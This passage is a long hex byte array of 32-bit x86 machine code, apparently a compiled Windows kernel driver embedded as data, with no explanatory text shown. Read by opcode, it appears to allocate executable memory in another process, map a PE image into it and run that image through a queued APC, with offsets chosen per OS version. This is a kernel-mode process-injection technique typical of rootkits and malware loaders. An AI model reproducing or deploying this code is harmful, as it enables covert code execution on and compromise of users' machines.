,0x65,0x6c,0x33,0x32,0x00,0x7e,0x45,0x4e,0x44,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x83,0x3d,0xdc,0x2d,0x00,0x10,0x00,0x74,0x0e,0xa1,0xdc,0x2d,0x00,0x10,0x8d,0x54,\r\n0x24,0x04,0xcd,0x2e,0xc2,0x14,0x00,0xb8,0x01,0x00,0x00,0x00,0xc2,0x14,0x00,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x08,0xc7,0x45,0xfc,0x00,0x00,0x00,0x00,0x8b,0x45,0x08,\r\n0x89,0x45,0xf8,0x8b,0x4d,0xf8,0x81,0x39,0x7e,0x45,0x4e,0x44,0x74,0x14,0x8b,0x55,\r\n0xfc,0x83,0xc2,0x01,0x89,0x55,0xfc,0x8b,0x45,0xf8,0x83,0xc0,0x01,0x89,0x45,0xf8,\r\n0xeb,0xe1,0x8b,0x45,0xfc,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x68,0xe4,0x03,0x00,0x10,0xe8,0x25,0x18,0x00,0x00,0x83,0xc4,0x04,\r\n0x6a,0x00,0x6a,0x00,0x68,0xcc,0x2d,0x00,0x10,0xff,0x15,0xd4,0x02,0x00,0x10,0x5d,\r\n0xc2,0x14,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x18,0xc6,0x45,0xf7,0x00,0x83,0x7d,0x08,0x00,0x74,0x0e,\r\n0x8b,0x45,0x08,0x50,0x8d,0x4d,0xf8,0x51,0xff,0x15,0x20,0x03,0x00,0x10,0x8b,0x55,\r\n0x10,0xc7,0x02,0x00,0x00,0x00,0x00,0x8b,0x45,0x14,0xc7,0x00,0x00,0x00,0x00,0x00,\r\n0x6a,0x05,0xe8,0xe9,0x16,0x00,0x00,0x89,0x45,0xf0,0x83,0x7d,0xf0,0x00,0x0f,0x84,\r\n0x4d,0x01,0x00,0x00,0x8b,0x4d,0xf0,0x89,0x4d,0xec,0x83,0x7d,0xec,0x00,0x0f,0x84,\r\n0x31,0x01,0x00,0x00,0x8b,0x55,0xec,0x83,0x7a,0x3c,0x00,0x0f,0x84,0x0a,0x01,0x00,\r\n0x00,0x8b,0x45,0xec,0x83,0x78,0x04,0x00,0x0f,0x86,0xfd,0x00,0x00,0x00,0x83,0x7d,\r\n0x08,0x00,0x74,0x1a,0x6a,0x01,0x8d,0x4d,0xf8,0x51,0x8b,0x55,0xec,0x83,0xc2,0x38,\r\n0x52,0xff,0x15,0xa0,0x02,0x00,0x10,0x0f,0xb6,0xc0,0x85,0xc0,0x75,0x19,0x83,0x7d,\r\n0x0c,0x00,0x0f,0x84,0xd3,0x00,0x00,0x00,0x8b,0x4d,0xec,0x8b,0x51,0x44,0x3b,0x55,\r\n0x0c,0x0f,0x85,0xc4,0x00,0x00,0x00,0x8b,0x45,0xec,0x8b,0x48,0x44,0x51,0x8b,0x55,\r\n0xec,0x83,0xc2,0x38,0x52,0x68,0x00,0x04,0x00,0x10,0xe8,0x43,0x17,0x00,0x00,0x83,\r\n0xc4,0x0c,0x8b,0x45,0x10,0x50,0x8b,0x4d,0xec,0x8b,0x91,0xdc,0x00,0x00,0x00,0x52,\r\n0xff,0x15,0x9c,0x02,0x00,0x10,0x89,0x45,0xe8,0x83,0x7d,0xe8,0x00,0x7d,0x11,0x
8b,\r\n0x45,0xe8,0x50,0x68,0x28,0x04,0x00,0x10,0xe8,0x15,0x17,0x00,0x00,0x83,0xc4,0x08,\r\n0x8b,0x4d,0x14,0x51,0x8b,0x55,0xec,0x8b,0x42,0x44,0x50,0xff,0x15,0x98,0x02,0x00,\r\n0x10,0x89,0x45,0xe8,0x83,0x7d,0xe8,0x00,0x7d,0x11,0x8b,0x4d,0xe8,0x51,0x68,0x5c,\r\n0x04,0x00,0x10,0xe8,0xea,0x16,0x00,0x00,0x83,0xc4,0x08,0x8b,0x55,0x10,0x83,0x3a,\r\n0x00,0x74,0x10,0x8b,0x45,0x14,0x83,0x38,0x00,0x74,0x08,0xc6,0x45,0xf7,0x01,0xeb,\r\n0x54,0xeb,0x38,0x8b,0x4d,0x10,0x83,0x39,0x00,0x74,0x14,0x8b,0x55,0x10,0x8b,0x0a,\r\n0xff,0x15,0x94,0x02,0x00,0x10,0x8b,0x45,0x10,0xc7,0x00,0x00,0x00,0x00,0x00,0x8b,\r\n0x4d,0x14,0x83,0x39,0x00,0x74,0x14,0x8b,0x55,0x14,0x8b,0x0a,0xff,0x15,0x94,0x02,\r\n0x00,0x10,0x8b,0x45,0x14,0xc7,0x00,0x00,0x00,0x00,0x00,0x8b,0x4d,0xec,0x83,0x39,\r\n0x00,0x75,0x02,0xeb,0x10,0x8b,0x55,0xec,0x8b,0x45,0xec,0x03,0x02,0x89,0x45,0xec,\r\n0xe9,0xc5,0xfe,0xff,0xff,0x6a,0x00,0x8b,0x4d,0xf0,0x51,0xff,0x15,0x90,0x02,0x00,\r\n0x10,0x8a,0x45,0xf7,0x8b,0xe5,0x5d,0xc2,0x10,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x6a,0xff,0x68,0xe0,0x2c,0x00,0x10,0x68,0x2a,0x2c,0x00,0x10,0x64,\r\n0xa1,0x00,0x00,0x00,0x00,0x50,0x64,0x89,0x25,0x00,0x00,0x00,0x00,0x83,0xc4,0xd8,\r\n0x53,0x56,0x57,0x89,0x65,0xe8,0x8b,0x45,0x0c,0x8b,0x4d,0x0c,0x03,0x48,0x3c,0x89,\r\n0x4d,0xe0,0xc7,0x45,0xd8,0x00,0x00,0x00,0x00,0x8b,0x55,0xe0,0x8b,0x42,0x50,0x89,\r\n0x45,0xdc,0x6a,0x40,0x68,0x00,0x30,0x00,0x00,0x8d,0x4d,0xdc,0x51,0x6a,0x00,0x8d,\r\n0x55,0xd8,0x52,0x8b,0x45,0x08,0x50,0xff,0x15,0xac,0x02,0x00,0x10,0x89,0x45,0xe4,\r\n0x83,0x7d,0xe4,0x00,0x0f,0x8c,0x26,0x01,0x00,0x00,0x8b,0x4d,0xd8,0x51,0x68,0x90,\r\n0x04,0x00,0x10,0xe8,0xea,0x15,0x00,0x00,0x83,0xc4,0x08,0xc7,0x45,0xfc,0x00,0x00,\r\n0x00,0x00,0x8b,0x55,0xdc,0x52,0x6a,0x00,0x8b,0x45,0xd8,0x50,0xe8,0xdd,0x15,0x00,\r\n0x00,0x83,0xc4,0x0c,0x8b,0x4d,0xe0,0x8b,0x51,0x54,0x52,0x8b,0x45,0x0c,0x50,0x8b,\r\n0x4d,0xd8,0x51,0xe8,0xf6,0x15,0x00,0x00,0x83,0xc4,0x0c,0x8b,0x55,0xe0,0x0f,0xb7,\r\n0x42,0x14,0x8b,0x4d,0xe0,0x8d,0x54,0x01,0x18,0x89,0x55,0xd4,0
xc7,0x45,0xd0,0x00,\r\n0x00,0x00,0x00,0xeb,0x09,0x8b,0x45,0xd0,0x83,0xc0,0x01,0x89,0x45,0xd0,0x8b,0x4d,\r\n0xe0,0x0f,0xb7,0x51,0x06,0x39,0x55,0xd0,0x73,0x4d,0x8b,0x45,0xd4,0x8b,0x4d,0xd4,\r\n0x8b,0x50,0x10,0x3b,0x51,0x08,0x73,0x0b,0x8b,0x45,0xd4,0x8b,0x48,0x10,0x89,0x4d,\r\n0xcc,0xeb,0x09,0x8b,0x55,0xd4,0x8b,0x42,0x08,0x89,0x45,0xcc,0x8b,0x4d,0xcc,0x51,\r\n0x8b,0x55,0xd4,0x8b,0x45,0x0c,0x03,0x42,0x14,0x50,0x8b,0x4d,0xd4,0x8b,0x55,0xd8,\r\n0x03,0x51,0x0c,0x52,0xe8,0x85,0x15,0x00,0x00,0x83,0xc4,0x0c,0x8b,0x45,0xd4,0x83,\r\n0xc0,0x28,0x89,0x45,0xd4,0xeb,0x9e,0x8b,0x4d,0xd8,0x51,0x8b,0x55,0xd8,0x52,0xe8,\r\n0x6c,0x12,0x00,0x00,0x0f,0xb6,0xc0,0x85,0xc0,0x74,0x18,0x8b,0x4d,0x14,0x8b,0x55,\r\n0xd8,0x89,0x11,0xc6,0x45,0xcb,0x01,0xc7,0x45,0xfc,0xff,0xff,0xff,0xff,0x8a,0x45,\r\n0xcb,0xeb,0x50,0xc7,0x45,0xfc,0xff,0xff,0xff,0xff,0xeb,0x1d,0xb8,0x01,0x00,0x00,\r\n0x00,0xc3,0x8b,0x65,0xe8,0x68,0xcc,0x04,0x00,0x10,0xe8,0xf3,0x14,0x00,0x00,0x83,\r\n0xc4,0x04,0xc7,0x45,0xfc,0xff,0xff,0xff,0xff,0x68,0x00,0x80,0x00,0x00,0x6a,0x00,\r\n0x8d,0x45,0xd8,0x50,0x8b,0x4d,0x08,0x51,0xff,0x15,0xa4,0x02,0x00,0x10,0xeb,0x11,\r\n0x8b,0x55,0xe4,0x52,0x68,0xec,0x04,0x00,0x10,0xe8,0xc4,0x14,0x00,0x00,0x83,0xc4,\r\n0x08,0x32,0xc0,0x8b,0x4d,0xf0,0x64,0x89,0x0d,0x00,0x00,0x00,0x00,0x5f,0x5e,0x5b,\r\n0x8b,0xe5,0x5d,0xc2,0x10,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x6a,0xff,0x68,0xf0,0x2c,0x00,0x10,0x68,0x2a,0x2c,0x00,0x10,0x64,\r\n0xa1,0x00,0x00,0x00,0x00,0x50,0x64,0x89,0x25,0x00,0x00,0x00,0x00,0x81,0xc4,0x60,\r\n0xff,0xff,0xff,0x53,0x56,0x57,0x89,0x65,0xe8,0xc6,0x45,0xdf,0x00,0xc7,0x45,0xe0,\r\n0x00,0x00,0x00,0x00,0x8d,0x45,0xe0,0x50,0x6a,0x00,0x6a,0x00,0x6a,0x00,0x6a,0x00,\r\n0x68,0x00,0x02,0x00,0x00,0x8b,0x4d,0x08,0x51,0xff,0x15,0x24,0x03,0x00,0x10,0x89,\r\n0x45,0xe4,0x83,0x7d,0xe4,0x00,0x0f,0x8c,0xfc,0x02,0x00,0x00,0x6a,0x00,0x6a,0x18,\r\n0x8d,0x55,0xc4,0x52,0x6a,0x00,0x8b,0x45,0xe0,0x50,0xff,0x15,0xd0,0x02,0x00,0x10,\r\n0x89,0x45,0xe4,0x83,0x7d,0xe4,0x00,0x7d,0x16,
0x8b,0x4d,0xe4,0x51,0x68,0x20,0x05,\r\n0x00,0x10,0xe8,0x1b,0x14,0x00,0x00,0x83,0xc4,0x08,0xe9,0xbd,0x02,0x00,0x00,0x8d,\r\n0x55,0xa8,0x52,0x8b,0x45,0x08,0x50,0xff,0x15,0xcc,0x02,0x00,0x10,0x8b,0x4d,0xc8,\r\n0x8b,0x51,0x08,0x89,0x55,0xc0,0xc7,0x45,0xa4,0x00,0x00,0x00,0x00,0x8d,0x45,0xa4,\r\n0x50,0x8b,0x4d,0x14,0x51,0x8b,0x55,0x10,0x52,0x8b,0x45,0xe0,0x50,0xe8,0x7e,0xfd,\r\n0xff,0xff,0x0f,0xb6,0xc8,0x85,0xc9,0x0f,0x84,0x75,0x02,0x00,0x00,0xc7,0x45,0xfc,\r\n0x00,0x00,0x00,0x00,0x8b,0x55,0x10,0x8b,0x45,0xa4,0x03,0x42,0x3c,0x89,0x45,0x9c,\r\n0x8b,0x4d,0x9c,0x8b,0x55,0xa4,0x03,0x51,0x28,0x89,0x55,0x94,0x8b,0x45,0x94,0x50,\r\n0x68,0x54,0x05,0x00,0x10,0xe8,0xa8,0x13,0x00,0x00,0x83,0xc4,0x08,0xc7,0x45,0x8c,\r\n0x00,0x00,0x00,0x00,0x68,0x80,0x11,0x00,0x10,0xe8,0x22,0xfb,0xff,0xff,0x89,0x45,\r\n0x98,0x8b,0x4d,0x98,0x83,0xc1,0x29,0x89,0x4d,0x90,0x6a,0x40,0x68,0x00,0x30,0x00,\r\n0x00,0x8d,0x55,0x90,0x52,0x6a,0x00,0x8d,0x45,0x8c,0x50,0x8b,0x4d,0xe0,0x51,0xff,\r\n0x15,0xac,0x02,0x00,0x10,0x89,0x45,0xa0,0x83,0x7d,0xa0,0x00,0x0f,0x8c,0xc9,0x01,\r\n0x00,0x00,0x8b,0x55,0x8c,0x52,0x68,0x8c,0x05,0x00,0x10,0xe8,0x52,0x13,0x00,0x00,\r\n0x83,0xc4,0x08,0x8b,0x45,0x90,0x50,0x68,0x90,0x00,0x00,0x00,0x8b,0x4d,0x8c,0x51,\r\n0xe8,0x49,0x13,0x00,0x00,0x83,0xc4,0x0c,0x8b,0x55,0x8c,0xc6,0x02,0x68,0x8b,0x45,\r\n0x8c,0x8b,0x4d,0xa4,0x89,0x48,0x01,0x8b,0x55,0x8c,0xc6,0x42,0x05,0xe8,0x8b,0x45,\r\n0x8c,0x83,0xc0,0x29,0x8b,0x4d,0x8c,0x83,0xc1,0x06,0x2b,0xc1,0x83,0xe8,0x04,0x8b,\r\n0x55,0x8c,0x89,0x42,0x06,0xb8,0x85,0xc0,0x00,0x00,0x8b,0x4d,0x8c,0x66,0x89,0x41,\r\n0x0a,0xba,0x0f,0x84,0x00,0x00,0x8b,0x45,0x8c,0x66,0x89,0x50,0x0c,0x8b,0x4d,0x8c,\r\n0x83,0xc1,0x26,0x8b,0x55,0x8c,0x83,0xc2,0x0e,0x2b,0xca,0x83,0xe9,0x04,0x8b,0x45,\r\n0x8c,0x89,0x48,0x0e,0x8b,0x4d,0x8c,0xc6,0x41,0x12,0x68,0x8b,0x55,0x8c,0xc7,0x42,\r\n0x13,0x00,0x00,0x00,0x00,0x8b,0x45,0x8c,0xc6,0x40,0x17,0x68,0x8b,0x4d,0x8c,0xc7,\r\n0x41,0x18,0x01,0x00,0x00,0x00,0x8b,0x55,0x8c,0xc6,0x42,0x1c,0x68,0x8b,0x45,0x8c,\r\n0x8b,0x4d,0xa4,0x89,0x48,0x1d
,0x8b,0x55,0x8c,0xc6,0x42,0x21,0xe8,0x8b,0x45,0x8c,\r\n0x83,0xc0,0x22,0x8b,0x4d,0x94,0x2b,0xc8,0x83,0xe9,0x04,0x8b,0x55,0x8c,0x89,0x4a,\r\n0x22,0x8b,0x45,0x8c,0xc6,0x40,0x26,0xc2,0xb9,0x03,0x00,0x00,0x00,0x8b,0x55,0x8c,\r\n0x66,0x89,0x4a,0x27,0x8b,0x45,0x98,0x50,0x68,0x80,0x11,0x00,0x10,0x8b,0x4d,0x8c,\r\n0x83,0xc1,0x29,0x51,0xe8,0xa5,0x12,0x00,0x00,0x83,0xc4,0x0c,0x8b,0x55,0x0c,0x03,\r\n0x15,0x80,0x2d,0x00,0x10,0x89,0x55,0x88,0x6a,0x00,0x6a,0x01,0x8b,0x45,0x8c,0x50,\r\n0x6a,0x00,0x68,0xb0,0x13,0x00,0x10,0x6a,0x00,0x8b,0x4d,0x0c,0x51,0x8d,0x95,0x58,\r\n0xff,0xff,0xff,0x52,0xff,0x15,0xc8,0x02,0x00,0x10,0x8b,0x45,0x88,0xc6,0x40,0x16,\r\n0x01,0x6a,0x00,0x6a,0x00,0x6a,0x00,0x8d,0x8d,0x58,0xff,0xff,0xff,0x51,0xff,0x15,\r\n0xc4,0x02,0x00,0x10,0x0f,0xb6,0xd0,0x85,0xd2,0x74,0x71,0xc7,0x85,0x50,0xff,0xff,\r\n0xff,0x80,0x69,0x67,0xff,0xc7,0x85,0x54,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0x8d,\r\n0x85,0x50,0xff,0xff,0xff,0x50,0x6a,0x00,0x6a,0x00,0x6a,0x00,0x68,0xcc,0x2d,0x00,\r\n0x10,0xff,0x15,0xc0,0x02,0x00,0x10,0x89,0x45,0xa0,0x81,0x7d,0xa0,0x02,0x01,0x00,\r\n0x00,0x75,0x0f,0x68,0xac,0x05,0x00,0x10,0xe8,0xd5,0x11,0x00,0x00,0x83,0xc4,0x04,\r\n0xeb,0x17,0x83,0x7d,0xa0,0x00,0x7c,0x11,0x68,0xe0,0x05,0x00,0x10,0xe8,0xc0,0x11,\r\n0x00,0x00,0x83,0xc4,0x04,0xc6,0x45,0xdf,0x01,0x8d,0x8d,0x50,0xff,0xff,0xff,0x51,\r\n0x6a,0x00,0x6a,0x00,0xff,0x15,0xbc,0x02,0x00,0x10,0xeb,0x0d,0x68,0x08,0x06,0x00,\r\n0x10,0xe8,0x9c,0x11,0x00,0x00,0x83,0xc4,0x04,0xeb,0x11,0x8b,0x55,0xa0,0x52,0x68,\r\n0x24,0x06,0x00,0x10,0xe8,0x89,0x11,0x00,0x00,0x83,0xc4,0x08,0xc7,0x45,0xfc,0xff,\r\n0xff,0xff,0xff,0xeb,0x1d,0xb8,0x01,0x00,0x00,0x00,0xc3,0x8b,0x65,0xe8,0x68,0x58,\r\n0x06,0x00,0x10,0xe8,0x6a,0x11,0x00,0x00,0x83,0xc4,0x04,0xc7,0x45,0xfc,0xff,0xff,\r\n0xff,0xff,0x8d,0x45,0xa8,0x50,0xff,0x15,0xb8,0x02,0x00,0x10,0x8b,0x4d,0xe0,0x51,\r\n0xff,0x15,0xb4,0x02,0x00,0x10,0xeb,0x11,0x8b,0x55,0xe4,0x52,0x68,0x78,0x06,0x00,\r\n0x10,0xe8,0x3c,0x11,0x00,0x00,0x83,0xc4,0x08,0x8a,0x45,0xdf,0x8b,0x4d,0xf0,0x64,\r\n0x89,0x0d,0x0
0,0x00,0x00,0x00,0x5f,0x5e,0x5b,0x8b,0xe5,0x5d,0xc2,0x10,0x00,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x0c,0xc6,0x45,0xff,0x00,0xc7,0x45,0xf4,0x00,0x00,0x00,\r\n0x00,0xc7,0x45,0xf8,0x00,0x00,0x00,0x00,0x8d,0x45,0xf4,0x50,0x8d,0x4d,0xf8,0x51,\r\n0x6a,0x00,0x8b,0x55,0x08,0x52,0xe8,0xf5,0xf8,0xff,0xff,0x0f,0xb6,0xc0,0x85,0xc0,\r\n0x74,0x2c,0x8b,0x4d,0x10,0x51,0x8b,0x55,0x0c,0x52,0x8b,0x45,0xf8,0x50,0x8b,0x4d,\r\n0xf4,0x51,0xe8,0x39,0xfc,0xff,0xff,0x88,0x45,0xff,0x8b,0x4d,0xf4,0xff,0x15,0x94,\r\n0x02,0x00,0x10,0x8b,0x4d,0xf8,0xff,0x15,0x94,0x02,0x00,0x10,0xeb,0x11,0x8b,0x55,\r\n0x08,0x52,0x68,0xa8,0x06,0x00,0x10,0xe8,0xb6,0x10,0x00,0x00,0x83,0xc4,0x08,0x8a,\r\n0x45,0xff,0x8b,0xe5,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x0c,0xc6,0x45,0xff,0x00,0xc7,0x45,0xf4,0x00,0x00,0x00,\r\n0x00,0xc7,0x45,0xf8,0x00,0x00,0x00,0x00,0x8d,0x45,0xf4,0x50,0x8d,0x4d,0xf8,0x51,\r\n0x8b,0x55,0x08,0x52,0x6a,0x00,0xe8,0x75,0xf8,0xff,0xff,0x0f,0xb6,0xc0,0x85,0xc0,\r\n0x74,0x2c,0x8b,0x4d,0x10,0x51,0x8b,0x55,0x0c,0x52,0x8b,0x45,0xf8,0x50,0x8b,0x4d,\r\n0xf4,0x51,0xe8,0xb9,0xfb,0xff,0xff,0x88,0x45,0xff,0x8b,0x4d,0xf4,0xff,0x15,0x94,\r\n0x02,0x00,0x10,0x8b,0x4d,0xf8,0xff,0x15,0x94,0x02,0x00,0x10,0xeb,0x11,0x8b,0x55,\r\n0x08,0x52,0x68,0xe8,0x06,0x00,0x10,0xe8,0x36,0x10,0x00,0x00,0x83,0xc4,0x08,0x8a,\r\n0x45,0xff,0x8b,0xe5,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x81,0xec,0x20,0x01,0x00,0x00,0xc7,0x85,0xe0,0xfe,0xff,0xff,0x1c,\r\n0x01,0x00,0x00,0x8d,0x85,0xe0,0xfe,0xff,0xff,0x50,0xff,0x15,0xdc,0x02,0x00,0x10,\r\n0x85,0xc0,0x7d,0x07,0x32,0xc0,0xe9,0x0f,0x01,0x00,0x00,0x83,0xbd,0xe4,0xfe,0xff,\r\n0xff,0x05,0x75,0x22,0x83,0xbd,0xe8,0xfe,0xff,0xff,0x01,0x75,0x19,0xc7,0x05,0xdc,\r\n0x2d,0x00,0x10,0x89,0x00,0x00,0x00,0xc7,0x05,0x80,0x2d,0x00,0x10,0x34,0x00,0x00,\r\n0x00,0xe9,0xbf,0x00,0x00,0x00,0x83,0xbd,0xe4,0xfe,0xff,0xff,0x05,0x75,0x39,0x83,\r\n0xbd,0xe8,0xfe,0xff,0xff,0x02,0x75,0x30,0xc7,0x05,0xdc,0x2d,0x00,0x10,0x8f,0x00,\
r\n0x00,0x00,0xc7,0x05,0x80,0x2d,0x00,0x10,0x28,0x00,0x00,0x00,0x0f,0xb7,0x4d,0xf4,\r\n0x85,0xc9,0x75,0x12,0x0f,0xb7,0x55,0xf6,0x85,0xd2,0x75,0x0a,0xc7,0x05,0x80,0x2d,\r\n0x00,0x10,0x34,0x00,0x00,0x00,0xeb,0x7d,0x83,0xbd,0xe4,0xfe,0xff,0xff,0x06,0x75,\r\n0x3b,0x83,0xbd,0xe8,0xfe,0xff,0xff,0x00,0x75,0x32,0x0f,0xb7,0x45,0xf4,0x85,0xc0,\r\n0x75,0x14,0x0f,0xb7,0x4d,0xf6,0x85,0xc9,0x75,0x0c,0xc7,0x05,0xdc,0x2d,0x00,0x10,\r\n0xcf,0x00,0x00,0x00,0xeb,0x0a,0xc7,0x05,0xdc,0x2d,0x00,0x10,0xd2,0x00,0x00,0x00,\r\n0xc7,0x05,0x80,0x2d,0x00,0x10,0x38,0x00,0x00,0x00,0xeb,0x39,0x83,0xbd,0xe4,0xfe,\r\n0xff,0xff,0x06,0x75,0x1f,0x83,0xbd,0xe8,0xfe,0xff,0xff,0x01,0x75,0x16,0xc7,0x05,\r\n0xdc,0x2d,0x00,0x10,0xd7,0x00,0x00,0x00,0xc7,0x05,0x80,0x2d,0x00,0x10,0x40,0x00,\r\n0x00,0x00,0xeb,0x11,0x68,0x28,0x07,0x00,0x10,0xe8,0x14,0x0f,0x00,0x00,0x83,0xc4,\r\n0x04,0x32,0xc0,0xeb,0x25,0x8b,0x15,0xdc,0x2d,0x00,0x10,0x52,0x68,0x58,0x07,0x00,\r\n0x10,0xe8,0xfc,0x0e,0x00,0x00,0x83,0xc4,0x08,0x6a,0x00,0x6a,0x01,0x68,0xcc,0x2d,\r\n0x00,0x10,0xff,0x15,0xd8,0x02,0x00,0x10,0xb0,0x01,0x8b,0xe5,0x5d,0xc3,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x51,0xff,0x15,0x88,0x02,0x00,0x10,0x89,0x45,0xfc,0x81,0x7d,0xfc,\r\n0x14,0x00,0x06,0x00,0x74,0x15,0x8b,0x45,0xfc,0x50,0x68,0x88,0x07,0x00,0x10,0xe8,\r\n0xbe,0x0e,0x00,0x00,0x83,0xc4,0x08,0x32,0xc0,0xeb,0x5b,0x8b,0x4d,0x08,0x89,0x0d,\r\n0xe0,0x2d,0x00,0x10,0xc7,0x05,0x88,0x2d,0x00,0x10,0x0c,0x00,0x00,0x00,0xc7,0x05,\r\n0x8c,0x2d,0x00,0x10,0x08,0x00,0x00,0x00,0xc7,0x05,0x84,0x2d,0x00,0x10,0x24,0x00,\r\n0x00,0x00,0xc7,0x05,0x90,0x2d,0x00,0x10,0xdc,0x00,0x00,0x00,0xc7,0x05,0x94,0x2d,\r\n0x00,0x10,0x08,0x00,0x00,0x00,0xc7,0x05,0x98,0x2d,0x00,0x10,0xc0,0x01,0x00,0x00,\r\n0xc7,0x05,0x9c,0x2d,0x00,0x10,0x9c,0x01,0x00,0x00,0xc7,0x05,0xa0,0x2d,0x00,0x10,\r\n0x10,0x00,0x00,0x00,0xb0,0x01,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x6a,0xff,0x68,0x00,0x2d,0x00,0x10,0x68,0x2a,0x2c,0x00,0x10,0x64,\r\n0xa1,0x00,0x00,0x00,0x00,0x50,0x64,0x89,0x25,0x00,0x00,0x00,0x00,
0x83,0xc4,0xcc,\r\n0x53,0x56,0x57,0xc7,0x45,0xe0,0x00,0x00,0x00,0x00,0xc7,0x45,0xfc,0x00,0x00,0x00,\r\n0x00,0x8b,0x45,0x10,0xc7,0x00,0x00,0x00,0x00,0x00,0x8b,0x4d,0x08,0x8b,0x51,0x04,\r\n0x89,0x55,0xe4,0xeb,0x08,0x8b,0x45,0xe4,0x8b,0x08,0x89,0x4d,0xe4,0x83,0x7d,0xe4,\r\n0x00,0x0f,0x84,0xa2,0x02,0x00,0x00,0x8b,0x55,0xe4,0x8b,0x42,0x04,0x89,0x45,0xd8,\r\n0x8b,0x4d,0xd8,0x0f,0xbf,0x51,0x06,0x83,0xe2,0x05,0x74,0x0b,0x8b,0x45,0xd8,0x8b,\r\n0x48,0x0c,0x89,0x4d,0xc0,0xeb,0x17,0x6a,0x10,0x6a,0x00,0x6a,0x00,0x6a,0x01,0x6a,\r\n0x00,0x8b,0x55,0xd8,0x52,0xff,0x15,0xe4,0x02,0x00,0x10,0x89,0x45,0xc0,0x8b,0x45,\r\n0xc0,0x89,0x45,0xd4,0x83,0x7d,0xd4,0x00,0x75,0x2a,0x8b,0x4d,0x0c,0x83,0x39,0x00,\r\n0x74,0x16,0x8b,0x55,0x10,0x83,0x3a,0x00,0x76,0x0e,0x6a,0x00,0x8b,0x45,0x0c,0x8b,\r\n0x08,0x51,0xff,0x15,0x90,0x02,0x00,0x10,0xc7,0x45,0xe0,0x9a,0x00,0x00,0xc0,0xe9,\r\n0x35,0x02,0x00,0x00,0x8b,0x55,0xe4,0x8b,0x45,0xd4,0x03,0x42,0x08,0x89,0x45,0xd4,\r\n0x8b,0x4d,0xd8,0x8b,0x55,0xe4,0x8b,0x41,0x14,0x2b,0x42,0x08,0x89,0x45,0xdc,0x83,\r\n0x7d,0xdc,0x00,0x0f,0x8e,0xbc,0x00,0x00,0x00,0x8b,0x4d,0x10,0x8b,0x11,0x03,0x55,\r\n0xdc,0x89,0x55,0xd0,0x8b,0x45,0xd0,0x50,0x6a,0x00,0xff,0x15,0xe0,0x02,0x00,0x10,\r\n0x89,0x45,0xcc,0x83,0x7d,0xcc,0x00,0x74,0x59,0x8b,0x4d,0x0c,0x83,0x39,0x00,0x74,\r\n0x2e,0x8b,0x55,0x10,0x83,0x3a,0x00,0x76,0x26,0x8b,0x45,0x10,0x8b,0x08,0x51,0x8b,\r\n0x55,0x0c,0x8b,0x02,0x50,0x8b,0x4d,0xcc,0x51,0xe8,0x60,0x0d,0x00,0x00,0x83,0xc4,\r\n0x0c,0x6a,0x00,0x8b,0x55,0x0c,0x8b,0x02,0x50,0xff,0x15,0x90,0x02,0x00,0x10,0x8b,\r\n0x4d,0xdc,0x51,0x8b,0x55,0xd4,0x52,0x8b,0x45,0x10,0x8b,0x4d,0xcc,0x03,0x08,0x51,\r\n0xe8,0x39,0x0d,0x00,0x00,0x83,0xc4,0x0c,0x8b,0x55,0x0c,0x8b,0x45,0xcc,0x89,0x02,\r\n0xeb,0x2a,0x8b,0x4d,0x0c,0x83,0x39,0x00,0x74,0x16,0x8b,0x55,0x10,0x83,0x3a,0x00,\r\n0x76,0x0e,0x6a,0x00,0x8b,0x45,0x0c,0x8b,0x08,0x51,0xff,0x15,0x90,0x02,0x00,0x10,\r\n0xc7,0x45,0xe0,0x9a,0x00,0x00,0xc0,0xe9,0x6d,0x01,0x00,0x00,0x8b,0x55,0x10,0x8b,\r\n0x02,0x03,0x45,0xdc,0x8b,0x4d,0x10,0x89,0x01,0x8b
,0x55,0xdc,0x8b,0x45,0x0c,0x8d,\r\n0x0c,0x90,0x89,0x4d,0x0c,0x8b,0x55,0xd8,0x8b,0x02,0x89,0x45,0xd8,0x83,0x7d,0xd8,\r\n0x00,0x0f,0x84,0x3d,0x01,0x00,0x00,0x8b,0x4d,0xd8,0x0f,0xbf,0x51,0x06,0x83,0xe2,\r\n0x05,0x74,0x0b,0x8b,0x45,0xd8,0x8b,0x48,0x0c,0x89,0x4d,0xbc,0xeb,0x17,0x6a,0x10,\r\n0x6a,0x00,0x6a,0x00,0x6a,0x01,0x6a,0x00,0x8b,0x55,0xd8,0x52,0xff,0x15,0xe4,0x02,\r\n0x00,0x10,0x89,0x45,0xbc,0x8b,0x45,0xbc,0x89,0x45,0xd4,0x83,0x7d,0xd4,0x00,0x75,\r\n0x2a,0x8b,0x4d,0x0c,0x83,0x39,0x00,0x74,0x16,0x8b,0x55,0x10,0x83,0x3a,0x00,0x76,\r\n0x0e,0x6a,0x00,0x8b,0x45,0x0c,0x8b,0x08,0x51,0xff,0x15,0x90,0x02,0x00,0x10,0xc7,\r\n0x45,0xe0,0x9a,0x00,0x00,0xc0,0xe9,0xde,0x00,0x00,0x00,0x8b,0x55,0xd8,0x8b,0x42,\r\n0x14,0x89,0x45,0xdc,0x83,0x7d,0xdc,0x00,0x0f,0x8e,0xb9,0x00,0x00,0x00,0x8b,0x4d,\r\n0x10,0x8b,0x11,0x03,0x55,0xdc,0x89,0x55,0xc8,0x8b,0x45,0xc8,0x50,0x6a,0x00,0xff,\r\n0x15,0xe0,0x02,0x00,0x10,0x89,0x45,0xc4,0x83,0x7d,0xc4,